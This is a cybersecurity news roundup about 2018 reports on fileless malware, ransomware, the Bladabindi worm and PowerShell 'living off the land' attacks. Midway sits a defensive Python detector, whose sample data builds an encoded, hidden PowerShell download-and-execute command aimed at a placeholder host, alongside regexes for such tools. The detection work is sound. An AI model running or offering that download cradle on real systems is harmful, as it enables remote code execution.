A completely fileless ransomware, dubbed Sorebrect, is “one of the first of its kind” to combine traditional ransom functionality with fileless tactics, according to a new Malwarebytes report.
In “Under the Radar: The Future of Undetected Malware,” Malwarebytes detailed four fileless attacks observed throughout 2018, including Emotet, TrickBot, SamSam and Sorebrect. The report referenced a study from the Ponemon Institute, which stated that “fileless malware attacks are estimated to account for 35% of all attacks in 2018, and they’re almost 10 times more likely to succeed than file-based attacks.”
Read more about the findings of the Malwarebytes report on TechTarget.
A new worm has been discovered which spreads a modern variant of the remote access tool (RAT) Bladabindi. According to researchers from Trend Micro, the worm spreads Bladabindi — also known as njRAT/Njw0rm — in a fileless form by propagating through removable drives and storage.
In a blog post, the cybersecurity team said Bladabindi has been recompiled, refreshed, and rehashed for years, leading to its presence in countless cyberespionage campaigns. The worm which is now spreading a modern variant of Bladabindi is detected as Worm.Win32.BLADABINDI.AA.
Read more about the new worm that is capable of keylogging, spying, and far more, on ZDNet.
Cyberattackers are successfully evading detection on Windows computers by abusing legitimate admin tools commonly found on the operating system. This is a pivotal finding of the SophosLabs 2019 Threat Report, which traces how the technique has risen from the fringes of the cybercriminal playbook to become a common feature in a growing number of cyber attacks.
Known in security parlance as ‘living off the land’ or ‘LoL’ because it avoids the need to download dedicated tools, a favourite target is PowerShell, a powerful command-line shell that ships by default on all recent Windows computers even though few users have heard of it.
WatchGuard Technologies’ information security predictions for 2019 include the emergence of vaporworms, a new breed of fileless malware with wormlike properties to self-propagate through vulnerable systems, along with a takedown of the internet itself and ransomware targeting utilities and industrial control systems.
“Cyber criminals are continuing to reshape the threat landscape as they update their tactics and escalate their attacks against businesses, governments and even the infrastructure of the internet itself,” said Corey Nachreiner, CTO at WatchGuard Technologies.
According to a study conducted by the Ponemon Institute and sponsored by Barkly, called the “2018 State of Endpoint Security Risk report,” nearly two-thirds of enterprise players have been compromised in the past 12 months by attacks which originated at endpoints, which the organization says is a 20 percent increase year-on-year. Such attacks can prove costly, with the average company enduring a cost of $7.12 million, or $440 per endpoint.
The report shows that zero-day vulnerabilities and fileless attacks are now deemed the most dangerous threats to the enterprise.
Read more about the findings of the new Ponemon study on ZDNet.
Cybercriminals seeking to avoid detection by antimalware defenses have increasingly begun using legitimate hacking tools and tactics — in addition to their own malware — to break into enterprise networks and literally hide in plain sight. Now a new and likely state-sponsored threat group has emerged that isn’t using any custom malware at all.
Instead, the group is exclusively relying on publicly available hacking tools and living-off-the-land tactics to conduct an especially stealthy and hard-to-detect cyber espionage campaign.
Read more about the “Gallmaker” group that is targeting government and military organizations in Europe and the Middle East on DarkReading.
Researchers have uncovered a new attack chain which exploits little-known Microsoft Windows utilities and innocuous software to fly under the radar in the quest to steal data. According to Symantec, the new malware campaign is a prime example of what the company calls “living off the land.”
In other words, attackers are turning to the resources already available on target machines as well as running simple scripts and shellcode in memory and performing fileless attacks. By focusing more on homegrown software and less on introducing foreign malware into target systems, threat actors can remain undetected for longer and minimize the risk of being exposed.
Read more about how attackers are turning to innocuous system processes to compromise Windows machines, on ZDNet.
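A defender-side triage of the PowerShell abuse described in the SophosLabs and Symantec items above (hidden-window, encoded, in-memory launches), as an added example that is not from any of the reports cited here; the process-creation events, the indicator regexes and the Office-parent list are constructed for illustration, not a vendor rule set.

```python
import base64
import re

# Constructed process-creation events (not real telemetry); the second mimics the
# document-spawned hidden, encoded PowerShell launch that LoL campaigns rely on.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')".encode("utf-16le")
).decode("ascii")
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "cmdline": "powershell.exe -NoProfile -Command Get-Process"},
    {"parent": "winword.exe", "cmdline": f"powershell.exe -nop -w hidden -enc {_ENCODED}"},
    {"parent": "cmd.exe", "cmdline": "notepad.exe readme.txt"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}  # assumed list
# -EncodedCommand accepts any unambiguous prefix, so match the usual abbreviations.
_ENC_RE = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
_HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
_IN_MEMORY_RE = re.compile(r"IEX|Invoke-Expression|DownloadString|Net\.WebClient|FromBase64String", re.I)
_PS_RE = re.compile(r"(?:^|\\)(?:powershell|pwsh)(?:\.exe)?\b", re.I)

def decode_encoded_command(cmdline):
    """Return the UTF-16LE script hidden behind -EncodedCommand, or None."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None  # not a real encoded command; treat as absent

def analyze(event):
    """Score one event; each reason is an independent fileless/LoL indicator."""
    cmd = event["cmdline"]
    reasons = []
    if not _PS_RE.search(cmd):
        return {"score": 0, "reasons": reasons, "decoded": None}
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded_command")
    if _HIDDEN_RE.search(cmd):
        reasons.append("hidden_window")
    if event["parent"].lower() in OFFICE_PARENTS:
        reasons.append("office_parent")
    # Inspect the decoded script when present, otherwise the raw command line.
    if _IN_MEMORY_RE.search(decoded or cmd):
        reasons.append("in_memory_download_or_exec")
    return {"score": len(reasons), "reasons": reasons, "decoded": decoded}
```

Only the second event scores; the benign administrative invocation in the first shows why the parent process and decoded content, not PowerShell itself, should drive alerting.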
A snapshot of the threat landscape from the first half of 2018 shows fileless and PowerShell attacks are the ones to worry about this year, security analysts report.
Endpoint security firm SentinelOne today published its “H1 2018 Enterprise Risk Index Report,” which shows fileless-based attacks rose by 94% between January and June. PowerShell attacks spiked from 2.5 attacks per 1,000 endpoints in May 2018 to 5.2 attacks per 1,000 endpoints in June. Ransomware remains popular, ranging from 5.6 to 14.4 attacks per 1,000 endpoints.
Read more about the findings of the SentinelOne report on DarkReading.